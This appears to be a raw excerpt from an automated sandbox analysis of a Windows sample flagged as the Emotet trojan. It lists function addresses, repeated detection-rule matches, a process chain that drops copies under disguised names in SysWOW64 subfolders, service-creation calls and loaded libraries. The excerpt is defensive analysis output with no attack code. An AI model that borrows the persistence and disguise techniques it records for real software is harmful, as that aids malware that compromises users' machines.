              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F65303_2_021F6530
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F3F203_2_021F3F20
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F77403_2_021F7740
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F1C703_2_021F1C70
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F3BA03_2_021F3BA0
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_0218380E3_2_0218380E
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_02185ABE3_2_02185ABE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021858AE3_2_021858AE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021892DE3_2_021892DE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021880CE3_2_021880CE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_0218573E3_2_0218573E
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_02189DDE3_2_02189DDE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: String function: 004243C6 appears 31 times
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: String function: 0040F510 appears 61 times
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: String function: 0040EA88 appears 142 times
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: String function: 004243C6 appears 31 times
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: String function: 0040F510 appears 61 times
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: String function: 0040EA88 appears 142 times
              Source: ExeFile (233).exe, 00000000.00000000.2105550930.0000000000441000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSock.EXEB vs ExeFile (233).exe
              Source: ExeFile (233).exeBinary or memory string: OriginalFilenameSock.EXEB vs ExeFile (233).exe
              Source: ExeFile (233).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 2.2.dfscli.exe.219279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.218279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.218052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.dfscli.exe.219052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.218052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.21c052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.21c279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.21c052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.dfscli.exe.2230000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.2260000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.dfscli.exe.219279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.218279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.21f0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.dfscli.exe.219052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.evad.winEXE@6/0@0/100
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,0_2_022687D0
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,2_2_022387D0
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F4CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32FirstW,Process32NextW,CloseHandle,FindCloseChangeNotification,3_2_021F4CB0
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00403250 FindResourceA,0_2_00403250
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02265070
              Source: ExeFile (233).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\ExeFile (233).exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: ExeFile (233).exeReversingLabs: Detection: 81%
              Source: unknownProcess created: C:\Users\user\Desktop\ExeFile (233).exe "C:\Users\user\Desktop\ExeFile (233).exe"
              Source: C:\Users\user\Desktop\ExeFile (233).exeProcess created: C:\Windows\SysWOW64\rtmpal\dfscli.exe "C:\Windows\SysWOW64\rtmpal\dfscli.exe"
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeProcess created: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe "C:\Windows\SysWOW64\KBDTZM\mibincodec.exe"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
              Source: C:\Users\user\Desktop\ExeFile (233).exeProcess created: C:\Windows\SysWOW64\rtmpal\dfscli.exe "C:\Windows\SysWOW64\rtmpal\dfscli.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeProcess created: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe "C:\Windows\SysWOW64\KBDTZM\mibincodec.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: feclient.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: feclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: feclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00402530 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,0_2_00402530
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040F54B push ecx; ret 0_2_0040F55B
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040E770 push eax; ret 0_2_0040E784
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040E770 push eax; ret 0_2_0040E7AC
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040EA88 push eax; ret 0_2_0040EAA6
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265E10 push ecx; mov dword ptr [esp], 0000F5B3h0_2_02265E11
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265EA0 push ecx; mov dword ptr [esp], 0000A3FDh0_2_02265EA1
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265EF0 push ecx; mov dword ptr [esp], 0000669Ch0_2_02265EF1
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265F20 push ecx; mov dword ptr [esp], 0000E36Ch0_2_02265F21
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265CD0 push ecx; mov dword ptr [esp], 00001CE1h0_2_02265CD1
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265D20 push ecx; mov dword ptr [esp], 0000C5A1h0_2_02265D21
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265D00 push ecx; mov dword ptr [esp], 00001F9Eh0_2_02265D01
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265D50 push ecx; mov dword ptr [esp], 00006847h0_2_02265D51
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265D90 push ecx; mov dword ptr [esp], 0000B2E0h0_2_02265D91
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265DF0 push ecx; mov dword ptr [esp], 0000AAF5h0_2_02265DF1
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02265DC0 push ecx; mov dword ptr [esp], 000089FAh0_2_02265DC1
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C7A3E push ecx; mov dword ptr [esp], 0000A3FDh0_2_021C7A3F
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C7A8E push ecx; mov dword ptr [esp], 0000669Ch0_2_021C7A8F
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C7ABE push ecx; mov dword ptr [esp], 0000E36Ch0_2_021C7ABF
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C786E push ecx; mov dword ptr [esp], 00001CE1h0_2_021C786F
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C789E push ecx; mov dword ptr [esp], 00001F9Eh0_2_021C789F
